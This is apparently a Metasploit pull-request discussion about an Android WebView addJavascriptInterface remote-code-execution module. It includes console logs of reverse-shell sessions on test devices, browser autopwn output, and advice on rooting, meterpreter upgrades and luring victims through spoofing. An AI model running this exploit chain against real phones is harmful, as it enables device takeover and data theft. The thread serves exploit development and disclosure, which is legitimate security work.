Android < 4.2 WebView addJavascriptInterface RCE

[jvennix-r7]

I was rewiring jduck's module for a side-channel attack on embedded Android WebView components, then noticed this actually gets you a shell on some versions of Android's Browser. So hooray, we now have an android browser exploit. Since it is easy to detect the presence of this vuln from JS code, I added it to browser_autopwn as well. A few other Android third party browsers were also vulnerable (notably baidu and QQ browsers: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/)

• [x] Download the Android SDK, download the 4.1.2 SDK (GoogleAPIs version), and create a new 4.1.2 GoogleAPIs 4.1.2 AVD device
• [x] Run the simulator for the 4.1.2 device, run the msf module. Open the Android Browser app and browse to the URL specified in the module
• [x] Shells

[wvu]

Great! Testing!

[wvu]

Hey, @jvennix-r7. Could you link to the specific SDK version?

[jvennix-r7]

@wvu-r7 sorry my steps are a little brief. Download the latest sdk, run ./sdk/tools/android, then check the Android 4.2.1 checkbox and click install packages. After it installs, Tools->Manage AVDs and create a new "Google APIs - API Level 16" target device. Then run the emulator ./sdk/tools/emulator -avd <avdname>

[wvu]

Ah, I didn't install the packages. Thanks! Android n00b here. :)

[todb]

Hey @joev-r7, this looks to me that this affects in the neighborhood of 70% of all Android devices running as of Feb 2014 (todayish).

Am I reading this right?

http://m.androidcentral.com/android-4x-now-786-active-devices-kitkat-still-under-2

If so, this is kinda huge.

[timwr]

It's not just Android devices < 4.2, apps built with sdk version < 4.2 are still vulnerable on Android 4.4.2 You can verify with Baidu 2.1.0.0 on > 4.2 device. Also the android browser (e.g on the XE12) has camera permissions...

PATH=$PATH:/system/bin
id
uid=10008(app_8) gid=10008(app_8) groups=1006(camera),1015(sdcard_rw),1029(private_cache_rw),3001(net_bt_admin),3002(net_bt),3003(inet)

[jvennix-r7]

@todb it affects <4.2 WebView components (including, I believe, "patched" apps recompiled post 4.2 still running on <4.2 devices). I have no idea how many distributions include a vulnerable Browser app.

[jvennix-r7]

@timwr okay wow, so even on latest android this affects all apps with WebViews that were never recompiled with sdk version >= 4.2

[wvu]

Works beautifully!

msf > use exploit/android/browser/webview_addjavascriptinterface 
msf exploit(webview_addjavascriptinterface) > exploit 
[*] Exploit running as background job.
msf exploit(webview_addjavascriptinterface) > 
[*] Started reverse handler on 10.6.0.198:4444 
[*] Using URL: http://0.0.0.0:8080/pds2H5RuIEo
[*]  Local IP: http://10.6.0.198:8080/pds2H5RuIEo
[*] Server started.
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:4444 -> 10.6.0.198:51186) at 2014-02-05 11:49:04 -0600

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011

[wvu]

Browser Autopwn:

msf > use auxiliary/server/browser_autopwn 
msf auxiliary(browser_autopwn) > set LHOST 10.6.0.198
LHOST => 10.6.0.198
msf auxiliary(browser_autopwn) > exploit 
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) > 
[*] Setup
[*] Obfuscating initial javascript 2014-02-05 12:12:46 -0600
[*] Done in 0.778086804 seconds

[*] Starting exploit modules on host 10.6.0.198...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/qcvLIf
[*]  Local IP: http://10.6.0.198:8080/qcvLIf
[*] Server started.
[snip]
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[snip]
[*] Started reverse handler on 10.6.0.198:6666 
[snip]
[*] Starting the payload handler...

[*] --- Done, found 19 exploit modules

[*] Using URL: http://0.0.0.0:8080/e3mEqsV
[*]  Local IP: http://10.6.0.198:8080/e3mEqsV
[*] Server started.
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV'
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV?sessid=TGludXg6QW5kcm9pZDp1bmRlZmluZWQ6ZW4tVVM6YXJtbGU6Q2hyb21lOnVuZGVmaW5lZDo%3d'
[*] 10.6.0.198       browser_autopwn - JavaScript Report: Linux:Android:undefined:en-US:armle:Chrome:undefined:
[*] 10.6.0.198       browser_autopwn - Reporting: {:os_name=>"Linux", :os_flavor=>"Android", :os_lang=>"en-US", :arch=>"armle"}
[*] 10.6.0.198       browser_autopwn - Responding with 7 exploits
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:6666 -> 10.6.0.198:60458) at 2014-02-05 12:15:16 -0600

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011

[todb-r7]

@wchen-r7 wanna eyeball?

https://github.com/rapid7/metasploit-framework/pull/2942

[wvu]

Code looks great, btw.

[jduck]

Looks good to me. Thanks for following up on this one. I hadn't considered trying it as a straight HTTP module because I was going after the advertising network SDK stuff =) In hindsight a browser module makes more sense anyway since you can use Karmetasploit, DNS hijacking, DNS spoofing, ARP spoofing, etc to get your victims to visit you too =)

<3

[jduck]

PS. It doesn't seem to work against my google glass ..

[wchen-r7]

@jvennix-r7 Please use the browser exploit server mixin and set the requirement to android, thanks.

[jvennix-r7]

@wchen-r7 I would like to, but another attack vector for this is injecting the statically-served JS into a webview Component (from mitm position), and browser exploit server kinda subverts this with its detection probe.

[jvennix-r7]

thinking on it more, I should be able to override BrowserExploitServer's onurirequest and divert the requests for the js file

[wchen-r7]

If you insist we can land w/ what we have now, not using the mixin isn't a blocker but it's just highly preferred. Let us know what you wanna do.

[jvennix-r7]

@wchen-r7 adding it now

[todb-r7]

Hey @jvennix-r7 just for next time can you make sure you refer to jduck as @jduck so he'll get alerted when the PR comes up? It's always nice to have @jduck's eyeballs attuned to whatever Android hotness we have coming up.

[jvennix-r7]

@todb-r7 doh, will remember to do that next time

[jvennix-r7]

@wchen-r7 added ExploitServer mixin, re-testing both attack vectors now

[jvennix-r7]

Okay, shells are still happening, looks good to me

[wvu]

Okay, looks good. +1 for BES.

[wvu]

Landing!

[todb-r7]

Dear vendors, please up-rev your Androids (and recompile your apps). Signed, The Internet

[jduck]

I agree with @todb-r7. This issue needs a lot more attention from the good guys since the bad guys are likely using it in Sochi !@#!#

PS. Found my embarrassing mistake and confirmed code execution works on my Google Glass XE12 too.

[wvu]

@jduck: Thanks for the update! Yeah, this is some serious (and awesome) stuff. :)

[floyd-fuh]

but hey... that will only pwn >70% of all Android devices O_o http://developer.android.com/about/dashboards/index.html?utm_content=buffer7a7fe&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

[wchen-r7]

@rsanz88 Not reproducing the issue atm. Do you see any other errors? Like maybe a " uninitialized constant" or something?

[todb]

@rsanz88 please turn your attention to the top four lined of the file. This ruby file will not run on its own.

You can download the Metasploit framework at http://metasploit.com/download.

[jjbinx]

Thanks for posting this. It worked without a hitch on my 4.1.2 emulator. I had no success with other emulators at API levels less than 4.1.2 (tried 4.0.3, and 2.3.3). I also tried on a Samsung running 4.1.2 (both default browser and chrome) without success. Is there a definitive way to check for the vulnerability other than running this script? Is there an easy way to figure out which apps are vulnerable? I know a good starting point is if an app can natively display a web page/html, but not all those apps will support javascript (for example I don't think any of the base email apps enable javascript support). thanks.

[jduck]

You can use http://www.droidsec.org/tests/addjsif/ to do a quick test.

[jjbinx]

Thanks! I got basically the same results; the only difference was that my 4.0.3 emulator reported vulnerable vs having the browser app crash with the ms script. None of the browsers on the physical devices I tested reported as vulnerable (most were 4.1.2 or older).

[0xdeadbeefJERKY]

I'm attempting to run this module on a physical device (not an emulator). The specs meet the requirements. It's outfitted with WebView/WebKit, running 2.3 and JavaScript is enabled, but I keep receiving the following error (even when trying out different payloads):

webview_addjavascriptinterface - Exception handling request: undefined method `[]=' for nil:NilClass

Help?

[jduck]

Devices < 3.x and >= 4.2 are not affected by the browser issue. See http://www.droidsec.org/news/2014/02/26/on-the-webview-addjsif-saga.html

[0xdeadbeefJERKY]

I'm now attempting to pop a reverse shell on a device running 4.1.1, but I'm still receiving zero output after the exploit HTML is being served to the device. I've tried every possible payload with no noticeable results.

[todb-r7]

@TheBananaStand See @jduck's link above -- you may be running into a mitigation by the phone manufacturer or carrier.

[0xdeadbeefJERKY]

That was my initial thought, but after working on resolving the issue for a while longer, I was able to successfully get a Linux shell using the TCP bind payloads. For some reason though, I'm unable to interact with them appropriately (similar to a meterpreter shell) and I'm still unable to pop a shell using a reverse TCP payload. I've tried testing the functionality by creating a malicious APK that contains a reverse TCP shell (via msfpayload) and installing it directly onto the device in order to connect back to my machine, but that has failed as well. Maybe there is a security mechanism preventing these callback connections from establishing.

[chrisdavis925]

@TheBananaStand can you give an update on any progress? I have the same result. I have an older device running 4.03 as well as a virtual Android 4.0.3 device running, and both do not properly respond I expect for this exploit.

Metasploit console returns that a new session is started for each device, but any commands passed do not work. I cannot get it to return any response, either.

Any ideas?

Perhaps you can comment further on the success you had with "TCP bind payloads" ?

[0xdeadbeefJERKY]

The bottom line is that reverse TCP shell payloads are not being delivered correctly. The only payload that seems to be working are TCP bind shells. However, when the exploit succeeds and a session is spawned, the interaction with that session is minimal and essentially useless, as seen below:

msf exploit(webview_addjavascriptinterface) > sessions -i 1 [*] Starting interaction with 1...

ls : [1]: ls: not found echo "wtf" wtf cd system cd asdf : [4]: cd: /system/asdf: No such file or directory

[jvennix-r7]

@TheBananaStand, use /system/bin/ls as the android shell does not have /system/bin in its $PATH. It is strange that reverse TCP is not working correctly, that is what I usually use for testing. Are you sure LHOST is accessible from the device?

You can also try the branch here: https://github.com/rapid7/metasploit-framework/pull/3086

Which will add android meterpreter support and uses a different stager.

[wvu]

export PATH+=":/system/bin"

export PATH="$PATH:/system/bin"

PATH="$PATH:/system/bin"
export PATH

[chrisdavis925]

Thanks @jvennix-r7 - that's what I need to get the shell to respond.

Has anyone figured out a root exploit that could be done on 4.x devices using the shell generated? It seems to me that there are a lot of commands that couldn't be executed with this shell. (example - am and pm command don't respond. neither do setprop or getprop)

[timwr]

@chrisdavis925 you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script: https://github.com/timwr/metasploit-framework/commit/1775f15c46224f268aacd4634e960308e54a9509

[chrisdavis925]

@timwr

Wow, yeah that is totally crazy. I am going to try this out tonight and report back if I was able to get this to work. I tried other android root binary exploits but they didn't work, so I'll see if the one you linked does.

Can you confirm that the expected result after executing the android_run_root binary on the target device is that the shell that is already opened by the WebView addJavascriptInterface will automatically elevate to root?

[ghost]

Hello, i want to install an apk like this: http://drops.wooyun.org/papers/548

But if i don't understand that: you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script: timwr@1775f15

With the command ls i get the directory of my android tablet. Thats ok. But how to start adb? I have opened a session with the browser autopwn ....

Thanks and best regards

[todb]

hi @tompom1 -- this isn't really a support forum. It's a development forum fora particular exploit.

You would be better off with your question directed at, say, #droidsec on Freenode IRC, or failing that, ##security on Freenode.

On Sun, May 11, 2014 at 1:05 PM, tompom1 notifications@github.com wrote:

Hello, i want to install an apk like this: http://drops.wooyun.org/papers/548

But if i don't understand that:

you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script: timwr@1775f15https://github.com/timwr/metasploit-framework/commit/1775f15

With the command ls i get the directory of my android tablet. Thats ok. But how to start adb? I have opened a session with the browser autopwn ....

Thanks and best regards

— Reply to this email directly or view it on GitHubhttps://github.com/rapid7/metasploit-framework/pull/2942#issuecomment-42778077 .

"Tod Beardsley" todb@packetfu.com | 512-438-9165 | @todb Such coin, plz send: DBgsRuWGWh3pkb6CAPnzM8NJjcH9nnVZo5

[ghost]

Hello

at Freenode IRC i get no answer??? Perhaps you can help me again.

I use KALI Linux and an Android 4.1.2 Tablet for my test. I want to install an App like this: http://drops.wooyun.org/papers/548

At Kali Linux i use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN). msf exploit(webviewaddjavascriptinterface) > [] 192.168.178.23 webviewaddjavascriptinterface - Gathering target information. [] 192.168.178.23 webviewaddjavascriptinterface - Sending response HTML. [] 192.168.178.23 webviewaddjavascriptinterface - Serving exploit HTML [] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000

msf exploit(webview_addjavascriptinterface) > sessions -i 1 [*] Starting interaction with 1... export PATH=/system/bin:$PATH ls -al drwxr-xr-x root root 2014-05-15 16:56 acct -rw-r--r-- root root 332 2014-05-15 16:56 boot.txt drwxrwx--x system cache 2014-05-10 09:22 cache dr-x------ root root 2014-05-15 16:56 config lrwxrwxrwx root root 2014-05-15 16:56 d -> /sys/kernel/debug drwxrwx--x system system 2014-05-12 09:41 data -rw-r--r-- root root 129 2014-05-15 16:56 default.prop drwxr-xr-x root root 2014-05-15 17:12 dev drwxr-xr-x radio radio 2014-05-09 13:55 efs lrwxrwxrwx root root 2014-05-15 16:56 emmc -> /storage/sdcard1 lrwxrwxrwx root root 2014-05-15 16:56 etc -> /system/etc -rwxr-x--- root root 105292 2014-05-15 16:56 init -rwxr-x--- root root 1107 2014-05-15 16:56 init.cm.rc -rwxr-x--- root root 2344 2014-05-15 16:56 init.goldfish.rc -rwxr-x--- root root 5171 2014-05-15 16:56 init.p1-common.rc -rwxr-x--- root root 5389 2014-05-15 16:56 init.p1.rc -rwxr-x--- root root 936 2014-05-15 16:56 init.p1.usb.rc -rwxr-x--- root root 17862 2014-05-15 16:56 init.rc -rwxr-x--- root root 1637 2014-05-15 16:56 init.trace.rc -rwxr-x--- root root 3915 2014-05-15 16:56 init.usb.rc -rw-r--r-- root root 1664 2014-05-15 16:56 lpm.rc drwxrwxr-x root system 2014-05-15 16:56 mnt dr-xr-xr-x root root 1970-01-01 00:00 proc drwxr-xr-x root root 2014-05-09 13:55 radio drwxr-x--- root root 2014-05-15 16:56 sbin lrwxrwxrwx root root 2014-05-15 16:56 sdcard -> /storage/sdcard0 d---r-x--- system sdcard_r 2014-05-15 16:56 storage drwxr-xr-x root root 2014-05-15 16:56 sys drwxr-xr-x root root 2014-05-09 13:56 system -rw-r--r-- root root 272 2014-05-15 16:56 ueventd.goldfish.rc -rw-r--r-- root root 2035 2014-05-15 16:56 ueventd.p1.rc -rw-r--r-- root root 5075 2014-05-15 16:56 ueventd.rc lrwxrwxrwx root root 2014-05-15 16:56 vendor -> /system/vendor

I want to copy some pictures to my KALI system but there is the problem: dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M /dev/sdc: cannot open for write: Permission denied

Or i want to run adb (no device!) adb devices

• daemon not running. starting it now on port 5038 *
• daemon started successfully * List of devices attached

Can someone help or explain me how to do this?

[todb]

You are opening a network shell but then expecting to have local shell access. This won't work.

You don't need an exploit if you just intend to use normal local shell commands (like adb and dd) - you just need to enable USB debugging and connect that way normally.

The android devices I've used this exploit on have curl available, so I use that to transfer files and stuff.